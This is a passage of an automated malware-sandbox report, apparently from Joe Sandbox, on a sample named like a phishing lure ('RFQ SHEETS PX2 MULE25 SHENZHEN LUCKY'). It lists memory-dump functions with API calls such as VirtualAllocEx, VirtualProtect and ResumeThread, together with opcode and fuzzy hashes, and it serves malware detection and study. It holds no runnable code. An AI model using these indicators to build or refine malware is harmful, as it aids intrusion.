                                                                                                                                                                                                • Opcode Fuzzy Hash: 072995af75fac73e47ba2e7bddf8cd2129575c5edf4cf8ebfa3066ef018a5607
                                                                                                                                                                                                • Instruction Fuzzy Hash: 051136B5C0065A9FCB14CF9AC544B9EFBF4FB48320F11816AD958A7244D738A944CFA5
                                                                                                                                                                                                Function 080A4408 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 080A447B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                • Opcode ID: 6d751f11c869d4ce00139e2445fd58018ca9f228e06257adcfe38f0861b6f07a
                                                                                                                                                                                                • Instruction ID: b6f960aac283cd07a2528734c12c25b9618499e60b042e8d59dfcd30c8b68973
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d751f11c869d4ce00139e2445fd58018ca9f228e06257adcfe38f0861b6f07a
                                                                                                                                                                                                • Instruction Fuzzy Hash: BD21F6B59007499FCB10DF9AC984BDEFBF5FB48320F10842AE958A7251D378A644CFA5
                                                                                                                                                                                                Function 0682DF28 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0682DF9B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                • Opcode ID: 179c9b2f432f17827cd3127951da0816e5fc3b433369b505e49bab7ae1ea81b9
                                                                                                                                                                                                • Instruction ID: 5185c7c730ec7afcdcdc7759eba525edd6e5913a41dc683a8a3e00db259ef088
                                                                                                                                                                                                • Opcode Fuzzy Hash: 179c9b2f432f17827cd3127951da0816e5fc3b433369b505e49bab7ae1ea81b9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C21D3B59002499FCB10DF9AC984BDEFBF4EB48320F10842AE958A7251D379A644CFA5
                                                                                                                                                                                                Function 080ADCB8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 080ADD26
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                • Opcode ID: 943a5a5832ce0d52a3042b621d339244265be834bbc5775a3e9d632732171bcd
                                                                                                                                                                                                • Instruction ID: 77abe1bedc26eca1c3e58549a688ee300464f0b94ba5ec3ed4ee319084cac5df
                                                                                                                                                                                                • Opcode Fuzzy Hash: 943a5a5832ce0d52a3042b621d339244265be834bbc5775a3e9d632732171bcd
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F1137719002499FCB10DFAAC845ADFBFF5EF88320F108819E519A7250C775A954DFA1
                                                                                                                                                                                                Function 080AE9A0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                                • Opcode ID: 4c2e02129e889d07859017ae36713ecf60fe28f6015aa508e996fa61857ca4d6
                                                                                                                                                                                                • Instruction ID: 1805f568e96dbf2e650e9cb88a840d4ad730dcdaf001872640d63ddaa0ae8fcb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c2e02129e889d07859017ae36713ecf60fe28f6015aa508e996fa61857ca4d6
                                                                                                                                                                                                • Instruction Fuzzy Hash: CA1136B1D003488FDB10DFAAC8497DEFBF5EB88324F20841AD519A7240CB79A944CBA5
                                                                                                                                                                                                Function 080A6A18 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 080AEFB5
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                                • Opcode ID: 63a36f053bc73388b0c1be743fee64f738f6f12686a0378658b633a6a3b400ce
                                                                                                                                                                                                • Instruction ID: a11c5cb94e3777b627f638c6a90c8ec731872842683789175eb3b61362f59b72
                                                                                                                                                                                                • Opcode Fuzzy Hash: 63a36f053bc73388b0c1be743fee64f738f6f12686a0378658b633a6a3b400ce
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7911F5B58043899FDB20DF9AC949BDEFBF8EB48310F108459E518A7240C375A954CFA1
                                                                                                                                                                                                Function 017298A8 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 4'^q
                                                                                                                                                                                                • API String ID: 0-1614139903
                                                                                                                                                                                                • Opcode ID: b949d25ccde51ae781ee7d4753aec6eff8ca48a1fd038f126b97a77c6c6822af
                                                                                                                                                                                                • Instruction ID: 95dd616430951c7e08b6e9d8382015e6f38d71667a91e188421622dd8e9da8ce
                                                                                                                                                                                                • Opcode Fuzzy Hash: b949d25ccde51ae781ee7d4753aec6eff8ca48a1fd038f126b97a77c6c6822af
                                                                                                                                                                                                • Instruction Fuzzy Hash: 116181313041328FDB14DF39C894A6ABBF9EF85214B0D44A9E64ACB361DB31DD42CB90
                                                                                                                                                                                                Function 068167F3 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: PH^q
                                                                                                                                                                                                • API String ID: 0-2549759414
                                                                                                                                                                                                • Opcode ID: 5a08112aba04242afef25336ceed668e557674849cd5341aab6d4d7d06fd0ad1
                                                                                                                                                                                                • Instruction ID: 3b5e6ca914ed09c289d988ea0ae8da161d051544fb549c5160dd1bcebcaac0da
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a08112aba04242afef25336ceed668e557674849cd5341aab6d4d7d06fd0ad1
                                                                                                                                                                                                • Instruction Fuzzy Hash: A2610470A102189FCB54DF28C994A9DBBF5FF49325B1186A9E865DF3A1DB30E881CB50
                                                                                                                                                                                                Function 06810007 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: PH^q
                                                                                                                                                                                                • API String ID: 0-2549759414
                                                                                                                                                                                                • Opcode ID: 51f41cb968a7696b6e90002ab7d75aad5d9c34f983ddca6b0219f58d0696b11e
                                                                                                                                                                                                • Instruction ID: 3907920276b04825912cfa6c770a96bf7eebaf16b94eb904e2bcbcac079e7890
                                                                                                                                                                                                • Opcode Fuzzy Hash: 51f41cb968a7696b6e90002ab7d75aad5d9c34f983ddca6b0219f58d0696b11e
                                                                                                                                                                                                • Instruction Fuzzy Hash: B3512330A102448FC755DF28C898A9A7BF5AF4A319B1545A9E416EF3B2DB35DC81CB50
                                                                                                                                                                                                Function 01728CD0 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: (o^q
                                                                                                                                                                                                • API String ID: 0-74704288
                                                                                                                                                                                                • Opcode ID: 283794c90808437a14f2395ad30c5f9f854decd08de9b1de66a33afa29031c10
                                                                                                                                                                                                • Instruction ID: d9f32254defbbedf18cd09e279760da3ba65019dd526b2dcf28467836d36e09c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 283794c90808437a14f2395ad30c5f9f854decd08de9b1de66a33afa29031c10
                                                                                                                                                                                                • Instruction Fuzzy Hash: E84103317042549FCB159B78D8146AEBBE2BFCD620F1481ADE616DB391CF319C02CB91
                                                                                                                                                                                                Function 01729698 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 4'^q
                                                                                                                                                                                                • API String ID: 0-1614139903
                                                                                                                                                                                                • Opcode ID: 9834437017bab753156e46fa617cb4badaace39b5726e5e19b6454d8fc73720c
                                                                                                                                                                                                • Instruction ID: bdbcd504c979c4548165181de4634c19fc819de021e0884a9e26f485603dbc93
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9834437017bab753156e46fa617cb4badaace39b5726e5e19b6454d8fc73720c
                                                                                                                                                                                                • Instruction Fuzzy Hash: DA414974600165DFCB15CF28D858AAABBB5BF48314F1540A9EA06CB3B1C735DD82CBA1
                                                                                                                                                                                                Function 080B4D00 Relevance: 1.3, Strings: 1, Instructions: 14COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: ,hS
                                                                                                                                                                                                • API String ID: 0-2437973879
                                                                                                                                                                                                • Opcode ID: ed392e45b71fb4a968861e681a9344ae2d914981b2ee57cdc1fa94343a8b3e26
                                                                                                                                                                                                • Instruction ID: 20a04c1390e769dae8f5ebf8fc312aecded25721e8a9c8b08eb084066d81df95
                                                                                                                                                                                                • Opcode Fuzzy Hash: ed392e45b71fb4a968861e681a9344ae2d914981b2ee57cdc1fa94343a8b3e26
                                                                                                                                                                                                • Instruction Fuzzy Hash: 81D012322001089E4F80EAA5E840EA677DDBB14710700C472E508C7521EB22E665EB52
                                                                                                                                                                                                Function 0819D1C0 Relevance: .5, Instructions: 528COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 967460b3840b8087db00ca11ce9674b2b8ce88c5702fde3b9f5bbaf08c2b02e3
                                                                                                                                                                                                • Instruction ID: d7b51107fc3811e4f36742feaa3aa067b4a3653bf421179c9a74458043d6eab1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 967460b3840b8087db00ca11ce9674b2b8ce88c5702fde3b9f5bbaf08c2b02e3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B32D174D05218CBDB14EF69EA886ACBBB1FF4A300F4154E9D089A7251DB305EE9CF45
                                                                                                                                                                                                Function 08199778 Relevance: .5, Instructions: 514COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 6c4bf72befd0dbc0ae8e22781fe81b90548a79de171e143e7c7fe4780ed54a99
                                                                                                                                                                                                • Instruction ID: ea71b689be13eae08d8a1d71ea3797ac6246f62b7caa4340b4ce42b84df08672
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c4bf72befd0dbc0ae8e22781fe81b90548a79de171e143e7c7fe4780ed54a99
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9732E270905228CFCB24EF69E9886ACBBB1FF49301F5054E9D088A7254DB359EE8CF55
                                                                                                                                                                                                Function 0819ABA8 Relevance: .5, Instructions: 492COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 2a56cbb51409cd5accfcdf5887e94b45fb0d00e197060ce88bb7af87cb39a788
                                                                                                                                                                                                • Instruction ID: d06e7eb267b0f1d0b85ae79334d0cd850d30cdd2890b52e68c0b3a495b0536ad
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a56cbb51409cd5accfcdf5887e94b45fb0d00e197060ce88bb7af87cb39a788
                                                                                                                                                                                                • Instruction Fuzzy Hash: BD221270D05628CBCB24EF69E98869CBBB1FF4A300F4054E9D089A7254DB315EE9CF56
                                                                                                                                                                                                Function 0819C0C3 Relevance: .5, Instructions: 484COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 7fcfe0512b5e3574b5f1d7d5a103c25307750a30981c111a8fa4a519f1e3b7e4
                                                                                                                                                                                                • Instruction ID: c540f28013cf3feaee92680a456dc8aa7acd8fa9ee61243aa38f183fc24f27da
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7fcfe0512b5e3574b5f1d7d5a103c25307750a30981c111a8fa4a519f1e3b7e4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3922D074D05228CFCB64EF68E98869DBBB0FF4A301F4055EAD489A3251DB305E99CF45
                                                                                                                                                                                                Function 080B4D38 Relevance: .5, Instructions: 482COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 1364305f1a986db328afd8ed8def2b380e8eeed2a087bd47eb3de3160d8683c3
                                                                                                                                                                                                • Instruction ID: 0a1f7def9832579575f89bd5d0fab7e2a564fb595fff5a7b90d5f146f468352a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1364305f1a986db328afd8ed8def2b380e8eeed2a087bd47eb3de3160d8683c3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 96220F70D05628CBDB64EF68E998ADCBBB1FF4A300F5054E9C088A7254DB355EA8CF45
                                                                                                                                                                                                Function 0819B7A0 Relevance: .4, Instructions: 429COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 51229f15c46faf800cae623f878b9e621e02040110fcc85aed79901b7f0fadec
                                                                                                                                                                                                • Instruction ID: a11fa39096711db12cf3e7b6d65d5fbb4a55a6989e6f7fc8405c7c9d0d51984f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 51229f15c46faf800cae623f878b9e621e02040110fcc85aed79901b7f0fadec
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A12D170905228CBCB24EF79E998AACBBB1FF49300F5054E9D088A7254DB315EE9CF55
                                                                                                                                                                                                Function 080B4D28 Relevance: .4, Instructions: 426COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 37f4adf13d44dcdb2ed02239964d141d3494a14be482480aba9551c5d20edbbb
                                                                                                                                                                                                • Instruction ID: 7236af05083c7a1ba99a780749e7b85d4fd54c49f9e57a66a6911b0dc46daecf
                                                                                                                                                                                                • Opcode Fuzzy Hash: 37f4adf13d44dcdb2ed02239964d141d3494a14be482480aba9551c5d20edbbb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 44120170905628CBDB64EF68E998ADCBBB1FF4A300F4054E9D088A7250DB355EA9CF45
                                                                                                                                                                                                Function 0819B7B0 Relevance: .4, Instructions: 420COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: f05bd6228353e6960ee6da13c0c0980714b0aa55686caa6763c6b5eb8168f2cb
                                                                                                                                                                                                • Instruction ID: 7726379b03c5fb634f0170df5d106e22e05bea93c27ba36193983a881fdfb013
                                                                                                                                                                                                • Opcode Fuzzy Hash: f05bd6228353e6960ee6da13c0c0980714b0aa55686caa6763c6b5eb8168f2cb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3612CF70905228CBCB24EF79E998AACBBB1FF49300F5054E9D088A7254DB315EE9CF55
                                                                                                                                                                                                Function 08199768 Relevance: .4, Instructions: 401COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: afb9e1c05eb2fa8db72074ae831957ede560f857362f1d939ea07df2ed0e90a7
                                                                                                                                                                                                • Instruction ID: 5f06dfeaeebad2e6f55463146d26ac7d3f934ec62b3b2d657ea7d3bae5285209
                                                                                                                                                                                                • Opcode Fuzzy Hash: afb9e1c05eb2fa8db72074ae831957ede560f857362f1d939ea07df2ed0e90a7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 06020470905228CFCB24EF69E9886ACBBB1FF4A301F5054E9D088A6254DB355EE8CF55
                                                                                                                                                                                                Function 01728E98 Relevance: .4, Instructions: 355COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 1287d0d226e37e22f5778fa7e7180069807d3ce3a41dc9a605c1e8c4944a6059
                                                                                                                                                                                                • Instruction ID: b5dea8667d90a7a47747fbb762aa3d39bdb4551cad77ac8022e765c82af76101
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1287d0d226e37e22f5778fa7e7180069807d3ce3a41dc9a605c1e8c4944a6059
                                                                                                                                                                                                • Instruction Fuzzy Hash: F7E1EA75A00224CFCB04CFADD58899DBBF6BF49314F1A8559E619AB362C735EC42CB50
                                                                                                                                                                                                Function 0819E276 Relevance: .3, Instructions: 290COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: cf27e6894ac64bb9891969c752ebbb035e24fdd2fa7dd77caafac98e3c15d034
                                                                                                                                                                                                • Instruction ID: 6903e7d6bb5c08e01c936e6e6a47f2bbbcdec4023c23508992fdf60f6c65c279
                                                                                                                                                                                                • Opcode Fuzzy Hash: cf27e6894ac64bb9891969c752ebbb035e24fdd2fa7dd77caafac98e3c15d034
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7BD12570D04259CFDB14EFA9E948AACBBB1FF46300F0194EAD089A7251DB305E99CF56
                                                                                                                                                                                                Function 0819E2B0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 25509f6232acc802d5dc589833e560a4169a3e5607df056c8e69dc3c4c863831
                                                                                                                                                                                                • Instruction ID: a3d1ea0dc16dfc01e78b23cc1e9a102c3165809ddc3faa5a9268ff6288933a7f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 25509f6232acc802d5dc589833e560a4169a3e5607df056c8e69dc3c4c863831
                                                                                                                                                                                                • Instruction Fuzzy Hash: 12C10270D04219CBDB18EFA9E988BADBBB1FF45300F4094A9D089B7251DB305E99CF56
                                                                                                                                                                                                Function 0819E273 Relevance: .3, Instructions: 266COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: fb25a5fa42be49c5deb9144c70d4b76c8f7ae0eb185c1bbf9daa6c5cf7aa7b4c
